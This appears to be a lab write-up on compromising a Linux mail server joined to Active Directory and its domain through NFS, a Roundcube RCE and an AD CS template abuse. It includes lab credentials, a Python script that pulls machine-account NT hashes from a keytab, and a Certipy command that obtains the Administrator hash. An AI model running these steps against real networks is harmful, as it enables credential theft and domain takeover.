🧑‍🎓Hybrid

You will learn about Linux machines joined to Active Directory and about exploiting AD CS (Active Directory Certificate Services).

Enumeration

IPs

10.10.221.54 mail.hybrid.vl
10.10.221.53 dc01.hybrid.vl

We have two machines

.53 is a Domain controller

.54 is a Linux mail server

From the nmap scan we can see that NFS is open. To enumerate the exported mount points we can run showmount -e <ip> and then mount the export locally.

After mounting we see a backup.tar.gz

After extracting the archive we have two directories, etc and opt

In etc/dovecot we find possible email credentials

In etc/sssd we find an interesting file with references to LDAP and Kerberos, so this machine is probably joined to the hybrid.vl domain

SSSD (System Security Services Daemon) is used to access remote directory services such as Active Directory and to provide single sign-on for Unix-based hosts, so its configuration is a strong hint that the box is domain joined

We also find a passwd file with the local users of this machine

In /opt/certs/hybrid.vl we find two files: one looks like a TLS certificate and the other like its private key

Now with the credentials discovered in the dovecot file we can try to log in to the webmail

admin@hybrid.vl:Duckling21
peter.turner@hybrid.vl:PeterIstToll!

The Admin's inbox is empty but we find something in Peter's inbox

The junk filter plugin is probably markasjunk (a Roundcube plugin), which should be vulnerable to RCE

We can use this exploit to gain a shell on the machine

Here we download a shell with curl and pipe it to bash

Privilege escalation Linux

This is the other user on the machine

Since we have write access to the share, and NFS with AUTH_SYS simply trusts the UID the client presents, we can create files on it that are owned by Peter's user id

We create a new user on the attacking machine with Peter's user id

We also need to edit /etc/login.defs and raise UID_MAX, because the UID that SSSD assigned to Peter is above the default maximum and useradd refuses it otherwise

From the attacking machine we copy bash (or sh) to the share and set the SUID bit on it. When running the copied bash, start it with -p, otherwise it drops the effective UID back to our own

Now we are Peter Turner

In the home folder we find a KeePass database, but it requires a password

Maybe we can try Peter's email password

And it works!

Now we have Peter's domain password, which also works on the Linux machine since it is domain joined

Privilege escalation domain

Now we enumerate the domain with bloodhound-python using Peter's domain credentials

Nothing interesting is found in this domain dump

But we can also enumerate the AD CS certificate templates with Certipy

My installation of Certipy gives problems, so I used the Docker version from secure-77

To view Certipy's output in BloodHound we need to install a different version of BloodHound, one that understands the certificate template data Certipy collects

Here we can see a custom certificate template

We can mark MAIL01 as owned and run the query for the shortest paths to misconfigured certificate templates from owned principals

We can see that MAIL01 is a member of DOMAIN COMPUTERS, which can enroll in the HYBRIDCOMPUTERS template. To enroll we need the MAIL01 machine account hash.

There is a keytab file at /etc/krb5.keytab. It holds the machine account's Kerberos keys, and a keytab extraction tool can pull out the rc4-hmac key, which is exactly the account's NTLM hash
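As an added example (not a tool from the original write-up), here is a minimal parser for the MIT keytab format that pulls the keys out of each entry. An rc4-hmac key is by definition MD4 of the UTF-16LE password, i.e. the NT hash, so for the machine account it is directly usable for pass-the-hash; AES keys are not invertible to an NT hash but can still be used for pass-the-key. The keytab bytes below are constructed inline (principal MAIL01$@HYBRID.VL with made-up keys, not real lab data) so the script runs offline; pass the path of the real /etc/krb5.keytab as the first argument to use it on the box.

```python
import struct
from typing import Dict, List

# Kerberos encryption type numbers (RFC 3961 / RFC 4757)
ETYPE_RC4_HMAC = 23      # key == MD4(UTF-16LE(password)) == NT hash
ETYPE_AES256 = 18
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
KEYTAB_MAGIC = b"\x05\x02"   # MIT keytab file format version 0x0502


def _counted(b: bytes) -> bytes:
    """keytab counted_octet_string: uint16 big-endian length + bytes."""
    return struct.pack(">H", len(b)) + b


def build_keytab(entries: List[Dict]) -> bytes:
    """Serialise entries in the 0x0502 layout; used here only to construct the sample."""
    out = bytearray(KEYTAB_MAGIC)
    for e in entries:
        body = bytearray()
        body += struct.pack(">H", len(e["components"]))
        body += _counted(e["realm"].encode())
        for comp in e["components"]:
            body += _counted(comp.encode())
        body += struct.pack(">I", 1)                 # name_type KRB5_NT_PRINCIPAL
        body += struct.pack(">I", e["timestamp"])
        body += struct.pack(">B", e["kvno"] & 0xFF)  # 8-bit kvno
        body += struct.pack(">HH", e["etype"], len(e["key"])) + e["key"]
        body += struct.pack(">I", e["kvno"])         # optional trailing 32-bit kvno
        out += struct.pack(">i", len(body)) + body   # int32 entry size, then the entry
    return bytes(out)


def parse_keytab(data: bytes) -> List[Dict]:
    """Parse an MIT keytab (version 0x0502) into a list of entry dicts."""
    if data[:2] != KEYTAB_MAGIC:
        raise ValueError("unsupported keytab version %r" % data[:2])
    pos, entries = 2, []
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size == 0:
            break
        if size < 0:                     # negative size marks a deleted slot: skip it
            pos += -size
            continue
        end, p = pos + size, pos
        (ncomp,) = struct.unpack_from(">H", data, p); p += 2
        (rlen,) = struct.unpack_from(">H", data, p); p += 2
        realm = data[p:p + rlen].decode(); p += rlen
        comps = []
        for _ in range(ncomp):
            (clen,) = struct.unpack_from(">H", data, p); p += 2
            comps.append(data[p:p + clen].decode()); p += clen
        p += 4                           # name_type (present only in version 0x0502)
        (timestamp,) = struct.unpack_from(">I", data, p); p += 4
        kvno = data[p]; p += 1
        etype, klen = struct.unpack_from(">HH", data, p); p += 4
        key = data[p:p + klen]; p += klen
        if end - p >= 4:                 # a non-zero 32-bit kvno overrides the 8-bit one
            (kvno32,) = struct.unpack_from(">I", data, p)
            kvno = kvno32 or kvno
        entries.append({"principal": "/".join(comps) + "@" + realm,
                        "timestamp": timestamp, "kvno": kvno, "etype": etype,
                        "etype_name": ETYPE_NAMES.get(etype, str(etype)), "key": key})
        pos = end
    return entries


def nt_hashes(entries: List[Dict]) -> Dict[str, str]:
    """Map principal -> NT hash (hex) for every rc4-hmac entry."""
    return {e["principal"]: e["key"].hex() for e in entries if e["etype"] == ETYPE_RC4_HMAC}


# Constructed sample keytab with made-up keys (NOT real lab data).
SAMPLE_KEYTAB = build_keytab([
    {"realm": "HYBRID.VL", "components": ["MAIL01$"], "timestamp": 1700000000, "kvno": 2,
     "etype": ETYPE_RC4_HMAC, "key": bytes.fromhex("00112233445566778899aabbccddeeff")},
    {"realm": "HYBRID.VL", "components": ["host", "mail.hybrid.vl"], "timestamp": 1700000000,
     "kvno": 2, "etype": ETYPE_AES256, "key": bytes(range(32))},
])

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_KEYTAB
    for e in parse_keytab(data):
        print(f'{e["principal"]:32} kvno={e["kvno"]} {e["etype_name"]:24} {e["key"].hex()}')
    for principal, nthash in nt_hashes(parse_keytab(data)).items():
        print(f"NT hash for {principal}: {nthash}")
```

The kvno matters in practice: if the machine password has rotated since the keytab was written, the entry with the highest kvno is the current key, and an older rc4-hmac entry would give a stale hash that the DC rejects.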

Now we can request the certificate

If we receive an error about the key size, we need to specify the key size the template expects in the request command

We can check the correct key size in bloodhound

We have successfully requested a certificate

Now to authenticate with the certificate (pass-the-cert) we can use this tool

We need to extract the key and the cert from the .pfx file

Then we change the Administrator password

Or we can directly request the Administrator NT hash with certipy auth, which authenticates with the certificate through PKINIT

sudo docker run -it -v $(pwd):/tmp certipy:latest certipy auth -pfx 'administrator.pfx' -username 'Administrator' -domain 'hybrid.vl' -dc-ip 10.10.221.53
